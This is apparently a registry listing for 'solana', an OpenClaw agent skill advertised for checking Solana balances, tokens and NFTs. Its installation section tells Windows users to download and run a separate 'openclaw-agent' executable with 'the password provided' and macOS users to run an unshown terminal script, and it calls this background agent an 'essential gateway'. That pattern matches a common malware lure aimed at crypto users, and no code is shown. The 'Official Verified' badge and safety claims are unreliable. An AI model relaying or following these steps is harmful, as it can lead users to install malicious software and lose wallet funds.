ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Analyze Solana wallet balances, monitor SPL tokens, and inspect NFT metadata efficiently with this powerful OpenClaw AI agent skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-rpozu
Or

What This Skill Does

The Solana skill for OpenClaw provides a powerful command-line interface for interacting with the Solana blockchain. Designed for developers, researchers, and power users, it enables comprehensive wallet analysis without needing to navigate complex web interfaces. This skill allows users to query SOL balances, monitor SPL token holdings, retrieve detailed account data, and trace transaction histories directly from their terminal. Furthermore, it integrates with specialized tools like Metaboss for deep-dive NFT metadata analysis and provides raw RPC access for advanced blockchain debugging.

Installation

To begin, ensure you have the openclaw-agent utility installed. For Windows users, download the latest release from the official repository and run the executable using the password provided. On macOS, follow the specific terminal script installation provided in the documentation. Once the bridge agent is active, run the OpenClaw installation command: clawhub install openclaw/skills/skills/hightower6eu/solana-rpozu. After successful installation, ensure the Solana CLI is installed on your system path and your environment is configured to connect to the mainnet RPC endpoint using solana config set --url https://api.mainnet-beta.solana.com.

Use Cases

This skill is perfect for automated asset monitoring and rapid blockchain investigation. Traders can use it to watch balance fluctuations in real-time using the watch utility, while developers can use it to verify token account structures for dApp debugging. It serves as an excellent tool for tracking high-value wallet activities, auditing NFT metadata for specific mints, or managing programmatic stake account oversight. Its portability makes it an essential component for any automated pipeline involving blockchain data.

Example Prompts

  1. "Check the current SOL balance and recent transaction history for address 7C4jsPZp9..."
  2. "List all SPL tokens held by this wallet address: 7C4jsPZp9... and show the balance of USDC."
  3. "Decode the metadata for this NFT mint address: B3wGv2... and tell me the collection name."

Tips & Limitations

Always verify your RPC connection status before executing critical read operations, as public endpoints can experience latency or rate limiting. For high-volume lookups, consider using a dedicated private RPC provider to ensure consistent performance. Remember that this skill focuses on data retrieval and analysis; it is not a wallet signing tool, and you should never expose private keys through the terminal environment. If you encounter issues, verify that the openclaw-agent process is still running in the background, as it serves as the essential gateway between your local environment and the Solana network.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-rpozu": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#defi#web3
Safety Score: 4/5

Flags: network-access, external-api, code-execution